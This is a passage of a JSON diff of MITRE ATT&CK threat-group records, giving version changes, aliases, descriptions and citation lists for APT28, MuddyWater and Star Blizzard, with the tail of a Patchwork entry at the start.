+                            "source_name": "TrendMicro Patchwork Dec 2017",
+                            "description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
+                            "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
+                        },
+                        {
+                            "source_name": "Volexity Patchwork June 2018",
+                            "description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
+                            "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+                        },
+                        {
+                            "source_name": "MONSOON",
+                            "description": "MONSOON is the name of an espionage campaign; we use it here to refer to the actor group behind the campaign. (Citation: Forcepoint Monsoon) (Citation: PaloAlto Patchwork Mar 2018)"
+                        },
+                        {
+                            "source_name": "Forcepoint Monsoon",
+                            "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.",
+                            "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.7",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2025-10-21 23:13:16.458000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.7\", \"old_value\": \"1.6\"}}}",
+                    "previous_version": "1.6",
+                    "version_change": "1.6 \u2192 1.7"
+                }
+            ],
+            "other_version_changes": [],
+            "patches": [
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--bef4c620-0787-42a8-a96d-b7eb6e85917c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:31:48.664000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "APT28",
+                    "description": "[APT28](https://attack.mitre.org/groups/G0007) is a threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165.(Citation: NSA/FBI Drovorub August 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021) This group has been active since at least 2004.(Citation: DOJ GRU Indictment Jul 2018)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Crowdstrike DNC June 2016)(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: FireEye APT28 January 2017)(Citation: GRIZZLY STEPPE JAR)(Citation: Sofacy DealersChoice)(Citation: Palo Alto Sofacy 06-2018)(Citation: Symantec APT28 Oct 2018)(Citation: ESET Zebrocy May 2019)\n\n[APT28](https://attack.mitre.org/groups/G0007) reportedly compromised the Hillary Clinton campaign, the Democratic National Committee, and the Democratic Congressional Campaign Committee in 2016 in an attempt to interfere with the U.S. presidential election.(Citation: Crowdstrike DNC June 2016) In 2018, the US indicted five GRU Unit 26165 officers associated with [APT28](https://attack.mitre.org/groups/G0007) for cyber operations (including close-access operations) conducted between 2014 and 2018 against the World Anti-Doping Agency (WADA), the US Anti-Doping Agency, a US nuclear facility, the Organization for the Prohibition of Chemical Weapons (OPCW), the Spiez Swiss Chemicals Laboratory, and other organizations.(Citation: US District Court Indictment GRU Oct 2018) Some of these were conducted with the assistance of GRU Unit 74455, which is also referred to as [Sandworm Team](https://attack.mitre.org/groups/G0034). ",
+                    "aliases": [
+                        "APT28",
+                        "IRON TWILIGHT",
+                        "SNAKEMACKEREL",
+                        "Swallowtail",
+                        "Group 74",
+                        "Sednit",
+                        "Sofacy",
+                        "Pawn Storm",
+                        "Fancy Bear",
+                        "STRONTIUM",
+                        "Tsar Team",
+                        "Threat Group-4127",
+                        "TG-4127",
+                        "Forest Blizzard",
+                        "FROZENLAKE",
+                        "GruesomeLarch"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0007",
+                            "external_id": "G0007"
+                        },
+                        {
+                            "source_name": "SNAKEMACKEREL",
+                            "description": "(Citation: Accenture SNAKEMACKEREL Nov 2018)"
+                        },
+                        {
+                            "source_name": "Fancy Bear",
+                            "description": "(Citation: Crowdstrike DNC June 2016)(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
+                        },
+                        {
+                            "source_name": "Tsar Team",
+                            "description": "(Citation: ESET Sednit Part 3)(Citation: Talos Seduploader Oct 2017)(Citation: Talos Seduploader Oct 2017)"
+                        },
+                        {
+                            "source_name": "APT28",
+                            "description": "(Citation: FireEye APT28) (Citation: SecureWorks TG-4127) (Citation: Crowdstrike DNC June 2016) (Citation: Kaspersky Sofacy) (Citation: ESET Sednit Part 3) (Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)(Citation: Symantec APT28 Oct 2018)(Citation: Securelist Sofacy Feb 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
+                        },
+                        {
+                            "source_name": "STRONTIUM",
+                            "description": "(Citation: Kaspersky Sofacy)(Citation: ESET Sednit Part 3)(Citation: Microsoft STRONTIUM Aug 2019)(Citation: Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)"
+                        },
+                        {
+                            "source_name": "FROZENLAKE",
+                            "description": "(Citation: Leonard TAG 2023)"
+                        },
+                        {
+                            "source_name": "Forest Blizzard",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "GruesomeLarch",
+                            "description": "(Citation: Nearest Neighbor Volexity)"
+                        },
+                        {
+                            "source_name": "IRON TWILIGHT",
+                            "description": "(Citation: Secureworks IRON TWILIGHT Profile)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)"
+                        },
+                        {
+                            "source_name": "Threat Group-4127",
+                            "description": "(Citation: SecureWorks TG-4127)"
+                        },
+                        {
+                            "source_name": "TG-4127",
+                            "description": "(Citation: SecureWorks TG-4127)"
+                        },
+                        {
+                            "source_name": "Pawn Storm",
+                            "description": "(Citation: SecureWorks TG-4127)(Citation: ESET Sednit Part 3)(Citation: TrendMicro Pawn Storm Dec 2020) "
+                        },
+                        {
+                            "source_name": "Swallowtail",
+                            "description": "(Citation: Symantec APT28 Oct 2018)"
+                        },
+                        {
+                            "source_name": "Group 74",
+                            "description": "(Citation: Talos Seduploader Oct 2017)"
+                        },
+                        {
+                            "source_name": "Accenture SNAKEMACKEREL Nov 2018",
+                            "description": "Accenture Security. (2018, November 29). SNAKEMACKEREL. Retrieved April 15, 2019.",
+                            "url": "https://www.accenture.com/t20181129T203820Z__w__/us-en/_acnmedia/PDF-90/Accenture-snakemackerel-delivers-zekapab-malware.pdf#zoom=50"
+                        },
+                        {
+                            "source_name": "Crowdstrike DNC June 2016",
+                            "description": "Alperovitch, D.. (2016, June 15). Bears in the Midst: Intrusion into the Democratic National Committee. Retrieved August 3, 2016.",
+                            "url": "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/"
+                        },
+                        {
+                            "source_name": "Leonard TAG 2023",
+                            "description": "Billy Leonard. (2023, April 19). Ukraine remains Russia\u2019s biggest cyber focus in 2023. Retrieved March 1, 2024.",
+                            "url": "https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/"
+                        },
+                        {
+                            "source_name": "US District Court Indictment GRU Oct 2018",
+                            "description": "Brady, S . (2018, October 3). Indictment - United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020.",
+                            "url": "https://www.justice.gov/opa/page/file/1098481/download"
+                        },
+                        {
+                            "source_name": "GRIZZLY STEPPE JAR",
+                            "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE \u2013 Russian Malicious Cyber Activity. Retrieved January 11, 2017.",
+                            "url": "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf"
+                        },
+                        {
+                            "source_name": "ESET Zebrocy May 2019",
+                            "description": "ESET Research. (2019, May 22). A journey to Zebrocy land. Retrieved June 20, 2019.",
+                            "url": "https://www.welivesecurity.com/2019/05/22/journey-zebrocy-land/"
+                        },
+                        {
+                            "source_name": "ESET Sednit Part 3",
+                            "description": "ESET. (2016, October). En Route with Sednit - Part 3: A Mysterious Downloader. Retrieved November 21, 2016.",
+                            "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
+                        },
+                        {
+                            "source_name": "Sofacy DealersChoice",
+                            "description": "Falcone, R. (2018, March 15). Sofacy Uses DealersChoice to Target European Government Agency. Retrieved June 4, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sofacy-uses-dealerschoice-target-european-government-agency/"
+                        },
+                        {
+                            "source_name": "FireEye APT28 January 2017",
+                            "description": "FireEye iSIGHT Intelligence. (2017, January 11). APT28: At the Center of the Storm. Retrieved November 17, 2024.",
+                            "url": "https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf"
+                        },
+                        {
+                            "source_name": "FireEye APT28",
+                            "description": "FireEye. (2015). APT28: A WINDOW INTO RUSSIA\u2019S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015.",
+                            "url": "https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf"
+                        },
+                        {
+                            "source_name": "Ars Technica GRU indictment Jul 2018",
+                            "description": "Gallagher, S. (2018, July 27). How they did it (and will likely try again): GRU hackers vs. US elections. Retrieved September 13, 2018.",
+                            "url": "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/"
+                        },
+                        {
+                            "source_name": "TrendMicro Pawn Storm Dec 2020",
+                            "description": "Hacquebord, F., Remorin, L. (2020, December 17). Pawn Storm\u2019s Lack of Sophistication as a Strategy. Retrieved January 13, 2021.",
+                            "url": "https://www.trendmicro.com/en_us/research/20/l/pawn-storm-lack-of-sophistication-as-a-strategy.html"
+                        },
+                        {
+                            "source_name": "Securelist Sofacy Feb 2018",
+                            "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, February 20). A Slice of 2017 Sofacy Activity. Retrieved November 27, 2018.",
+                            "url": "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/"
+                        },
+                        {
+                            "source_name": "Kaspersky Sofacy",
+                            "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.",
+                            "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/"
+                        },
+                        {
+                            "source_name": "Nearest Neighbor Volexity",
+                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
+                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
+                        },
+                        {
+                            "source_name": "Palo Alto Sofacy 06-2018",
+                            "description": "Lee, B., Falcone, R. (2018, June 06). Sofacy Group\u2019s Parallel Attacks. Retrieved June 18, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/"
+                        },
+                        {
+                            "source_name": "Talos Seduploader Oct 2017",
+                            "description": "Mercer, W., et al. (2017, October 22). \"Cyber Conflict\" Decoy Document Used in Real Cyber Conflict. Retrieved November 2, 2018.",
+                            "url": "https://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Microsoft STRONTIUM New Patterns Cred Harvesting Sept 2020",
+                            "description": "Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.",
+                            "url": "https://www.microsoft.com/security/blog/2020/09/10/strontium-detecting-new-patters-credential-harvesting/"
+                        },
+                        {
+                            "source_name": "Microsoft STRONTIUM Aug 2019",
+                            "description": "MSRC Team. (2019, August 5). Corporate IoT \u2013 a path to intrusion. Retrieved August 16, 2019.",
+                            "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion/"
+                        },
+                        {
+                            "source_name": "DOJ GRU Indictment Jul 2018",
+                            "description": "Mueller, R. (2018, July 13). Indictment - United States of America vs. VIKTOR BORISOVICH NETYKSHO, et al. Retrieved November 17, 2024.",
+                            "url": "https://cdn.cnn.com/cnn/2018/images/07/13/gru.indictment.pdf"
+                        },
+                        {
+                            "source_name": "Cybersecurity Advisory GRU Brute Force Campaign July 2021",
+                            "description": "NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.",
+                            "url": "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF"
+                        },
+                        {
+                            "source_name": "NSA/FBI Drovorub August 2020",
+                            "description": "NSA/FBI. (2020, August). Russian GRU 85th GTsSS Deploys Previously Undisclosed Drovorub Malware. Retrieved August 25, 2020.",
+                            "url": "https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF"
+                        },
+                        {
+                            "source_name": "SecureWorks TG-4127",
+                            "description": "SecureWorks Counter Threat Unit Threat Intelligence. (2016, June 16). Threat Group-4127 Targets Hillary Clinton Presidential Campaign. Retrieved August 3, 2016.",
+                            "url": "https://www.secureworks.com/research/threat-group-4127-targets-hillary-clinton-presidential-campaign"
+                        },
+                        {
+                            "source_name": "Secureworks IRON TWILIGHT Active Measures March 2017",
+                            "description": "Secureworks CTU. (2017, March 30). IRON TWILIGHT Supports Active Measures. Retrieved February 28, 2022.",
+                            "url": "https://www.secureworks.com/research/iron-twilight-supports-active-measures"
+                        },
+                        {
+                            "source_name": "Secureworks IRON TWILIGHT Profile",
+                            "description": "Secureworks CTU. (n.d.). IRON TWILIGHT. Retrieved February 28, 2022.",
+                            "url": "https://www.secureworks.com/research/threat-profiles/iron-twilight"
+                        },
+                        {
+                            "source_name": "Symantec APT28 Oct 2018",
+                            "description": "Symantec Security Response. (2018, October 04). APT28: New Espionage Operations Target Military and Government Organizations. Retrieved November 14, 2018.",
+                            "url": "https://www.symantec.com/blogs/election-security/apt28-espionage-military-government"
+                        },
+                        {
+                            "source_name": "Sednit",
+                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware [JHUHUGIT](https://attack.mitre.org/software/S0044).(Citation: FireEye APT28 January 2017)(Citation: SecureWorks TG-4127)(Citation: Kaspersky Sofacy)(Citation: Ars Technica GRU indictment Jul 2018)"
+                        },
+                        {
+                            "source_name": "Sofacy",
+                            "description": "This designation has been used in reporting both to refer to the threat group and its associated malware.(Citation: FireEye APT28)(Citation: SecureWorks TG-4127)(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 3)(Citation: Ars Technica GRU indictment Jul 2018)(Citation: Talos Seduploader Oct 2017)"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Drew Church, Splunk",
+                        "Emily Ratliff, IBM",
+                        "Richard Gold, Digital Shadows",
+                        "S\u00e9bastien Ruel, CGI"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "5.3",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.732000+00:00\", \"old_value\": \"2026-04-21 13:20:49.866000+00:00\"}}}",
+                    "previous_version": "5.3"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.731000+00:00",
+                    "name": "MuddyWater",
+                    "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) is a cyber espionage group assessed to be a subordinate element within Iran's Ministry of Intelligence and Security (MOIS).(Citation: CYBERCOM Iranian Intel Cyber January 2022) Since at least 2017, [MuddyWater](https://attack.mitre.org/groups/G0069) has targeted a range of government and private organizations across sectors, including telecommunications, local government, finance, defense, and oil and natural gas organizations, in the Middle East (specifically the UAE and Saudi Arabia), Asia, Africa, Europe, and North America. [MuddyWater](https://attack.mitre.org/groups/G0069) has reused domains dating back to October 2025, and has a preference for NameCheap and Hosterdaddy Private Limited (AS136557). In late 2025 and early 2026, [MuddyWater](https://attack.mitre.org/groups/G0069) used commercial satellite internet (i.e., Starlink) for command and control (C2) communication. (Citation: FalconFeeds_Iran_Mar2026)(Citation: Huntio_IranInfra_Mar2026)(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)(Citation: NaumaanProofpoint_GlobalClickFix_April2025)(Citation: ESET_MuddyWater_Dec2025)(Citation: SymantecCarbonBlack_Seedworm_Mar2026)   ",
+                    "aliases": [
+                        "MuddyWater",
+                        "Earth Vetala",
+                        "MERCURY",
+                        "Static Kitten",
+                        "Seedworm",
+                        "TEMP.Zagros",
+                        "Mango Sandstorm",
+                        "TA450",
+                        "MuddyKrill"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G0069",
+                            "external_id": "G0069"
+                        },
+                        {
+                            "source_name": "Cloudflare 2026 Threat Report New Threat Actors March 2026",
+                            "description": " Cloudflare. (2026, March 3). Introducing the 2026 Cloudflare Threat Report. Retrieved April 18, 2026.",
+                            "url": "https://blog.cloudflare.com/2026-threat-report/"
+                        },
+                        {
+                            "source_name": "MERCURY",
+                            "description": "(Citation: Anomali Static Kitten February 2021)"
+                        },
+                        {
+                            "source_name": "Static Kitten",
+                            "description": "(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "MuddyKrill",
+                            "description": "(Citation: Cloudflare 2026 Threat Report New Threat Actors March 2026)"
+                        },
+                        {
+                            "source_name": "TEMP.Zagros",
+                            "description": "(Citation: FireEye MuddyWater Mar 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "Mango Sandstorm",
+                            "description": "(Citation: Microsoft Threat Actor Naming July 2023)"
+                        },
+                        {
+                            "source_name": "TA450",
+                            "description": "(Citation: Proofpoint TA450 Phishing March 2024)"
+                        },
+                        {
+                            "source_name": "Seedworm",
+                            "description": "(Citation: Symantec MuddyWater Dec 2018)(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "Earth Vetala",
+                            "description": "(Citation: Trend Micro Muddy Water March 2021)"
+                        },
+                        {
+                            "source_name": "MuddyWater",
+                            "description": "(Citation: Unit 42 MuddyWater Nov 2017)(Citation: Symantec MuddyWater Dec 2018)"
+                        },
+                        {
+                            "source_name": "ClearSky MuddyWater Nov 2018",
+                            "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf"
+                        },
+                        {
+                            "source_name": "ClearSky MuddyWater June 2019",
+                            "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020.",
+                            "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf"
+                        },
+                        {
+                            "source_name": "CYBERCOM Iranian Intel Cyber January 2022",
+                            "description": "Cyber National Mission Force. (2022, January 12). Iranian intel cyber suite of malware uses open source tools. Retrieved September 30, 2022.",
+                            "url": "https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/"
+                        },
+                        {
+                            "source_name": "ESET_MuddyWater_Dec2025",
+                            "description": "ESET Research. (2025, December 2). MuddyWater: Snakes by the riverbank. Retrieved February 17, 2026.",
+                            "url": "https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/"
+                        },
+                        {
+                            "source_name": "FalconFeeds_Iran_Mar2026",
+                            "description": "FalconFeeds.io. (2026, March 5). The Digital Redoubt: Iran\u2019s National Information Network and the Asymmetry of Modern Cyber Conflict. Retrieved March 9, 2026.",
+                            "url": "https://falconfeeds.io/blogs/the-digital-redoubt-irans-national-information-network-cyber-conflict"
+                        },
+                        {
+                            "source_name": "DHS CISA AA22-055A MuddyWater February 2022",
+                            "description": "FBI, CISA, CNMF, NCSC-UK. (2022, February 24). Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks. Retrieved September 27, 2022.",
+                            "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-055a"
+                        },
+                        {
+                            "source_name": "Huntio_IranInfra_Mar2026",
+                            "description": "Hunt.io. (2026, March 4). Iranian APT Infrastructure in Focus:  Mapping State-Aligned Clusters During Geopolitical Escalation. Retrieved April 16, 2026.",
+                            "url": "https://hunt.io/blog/iranian-apt-infrastructure-state-aligned-clusters"
+                        },
+                        {
+                            "source_name": "Unit 42 MuddyWater Nov 2017",
+                            "description": "Lancaster, T.. (2017, November 14). Muddying the Water: Targeted Attacks in the Middle East. Retrieved March 15, 2018.",
+                            "url": "https://researchcenter.paloaltonetworks.com/2017/11/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/"
+                        },
+                        {
+                            "source_name": "Talos MuddyWater Jan 2022",
+                            "description": "Malhortra, A and Ventura, V. (2022, January 31). Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables. Retrieved June 22, 2022.",
+                            "url": "https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html"
+                        },
+                        {
+                            "source_name": "Anomali Static Kitten February 2021",
+                            "description": "Mele, G. et al. (2021, February 10). Probable Iranian Cyber Actors, Static Kitten, Conducting Cyberespionage Campaign Targeting UAE and Kuwait Government Agencies. Retrieved March 17, 2021.",
+                            "url": "https://www.anomali.com/blog/probable-iranian-cyber-actors-static-kitten-conducting-cyberespionage-campaign-targeting-uae-and-kuwait-government-agencies"
+                        },
+                        {
+                            "source_name": "Microsoft Threat Actor Naming July 2023",
+                            "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.",
+                            "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide"
+                        },
+                        {
+                            "source_name": "Proofpoint TA450 Phishing March 2024",
+                            "description": "Miller, J. et al. (2024, March 21). Security Brief: TA450 Uses Embedded Links in PDF Attachments in Latest Campaign. Retrieved March 27, 2024.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta450-uses-embedded-links-pdf-attachments-latest-campaign"
+                        },
+                        {
+                            "source_name": "NaumaanProofpoint_GlobalClickFix_April2025",
+                            "description": "Naumaan, S., et al. (2025, April 17). Around the World in 90 Days: State-Sponsored Actors Try ClickFix . Retrieved January 21, 2026.",
+                            "url": "https://www.proofpoint.com/us/blog/threat-insight/around-world-90-days-state-sponsored-actors-try-clickfix"
+                        },
+                        {
+                            "source_name": "Trend Micro Muddy Water March 2021",
+                            "description": "Peretz, A. and Theck, E. (2021, March 5). Earth Vetala \u2013 MuddyWater Continues to Target Organizations in the Middle East. Retrieved March 18, 2021.",
+                            "url": "https://www.trendmicro.com/en_us/research/21/c/earth-vetala---muddywater-continues-to-target-organizations-in-t.html"
+                        },
+                        {
+                            "source_name": "Reaqta MuddyWater November 2017",
+                            "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020.",
+                            "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/"
+                        },
+                        {
+                            "source_name": "FireEye MuddyWater Mar 2018",
+                            "description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
+                            "url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html"
+                        },
+                        {
+                            "source_name": "Symantec MuddyWater Dec 2018",
+                            "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
+                            "url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group"
+                        },
+                        {
+                            "source_name": "SymantecCarbonBlack_Seedworm_Mar2026",
+                            "description": "Threat Hunter Team. (2026, March 5). Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company. Retrieved March 5, 2026.",
+                            "url": "https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Daniyal Naeem, BT Security",
+                        "Marco Pedrinazzi, @pedrinazziM",
+                        "Ozer Sarilar, @ozersarilar, STM",
+                        "Dragos Threat Intelligence"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "7.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.731000+00:00\", \"old_value\": \"2026-04-23 03:26:57.416000+00:00\"}}}",
+                    "previous_version": "7.0"
+                },
+                {
+                    "type": "intrusion-set",
+                    "id": "intrusion-set--9b36c218-4d80-4ec6-a68d-cc2886bbe410",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-06-14 18:17:18.727000+00:00",
+                    "modified": "2026-05-12 15:12:00.732000+00:00",
+                    "name": "Star Blizzard",
+                    "description": "[Star Blizzard](https://attack.mitre.org/groups/G1033) is a cyber espionage and influence group originating in Russia that has been active since at least 2019. [Star Blizzard](https://attack.mitre.org/groups/G1033) campaigns align closely with Russian state interests and have included persistent phishing and credential theft against academic, defense, government, NGO, and think tank organizations in NATO countries, particularly the US and the UK.(Citation: Microsoft Star Blizzard August 2022)(Citation: CISA Star Blizzard Advisory December 2023)(Citation: StarBlizzard)(Citation: Google TAG COLDRIVER January 2024)\n",
+                    "aliases": [
+                        "Star Blizzard",
+                        "SEABORGIUM",
+                        "Callisto Group",
+                        "TA446",
+                        "COLDRIVER"
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/groups/G1033",
+                            "external_id": "G1033"
+                        },
+                        {
+                            "source_name": "Callisto Group",
+                            "description": "(Citation: CISA Star Blizzard Advisory December 2023)"
+                        },
+                        {
+                            "source_name": "TA446",
+                            "description": "(Citation: CISA Star Blizzard Advisory December 2023)"
+                        },
+                        {
+                            "source_name": "COLDRIVER",
+                            "description": "(Citation: Google TAG COLDRIVER January 2024)"
+                        },
+                        {
+                            "source_name": "SEABORGIUM",
+                            "description": "(Citation: Microsoft Star Blizzard August 2022)"
+                        },
+                        {
+                            "source_name": "CISA Star Blizzard Advisory December 2023",
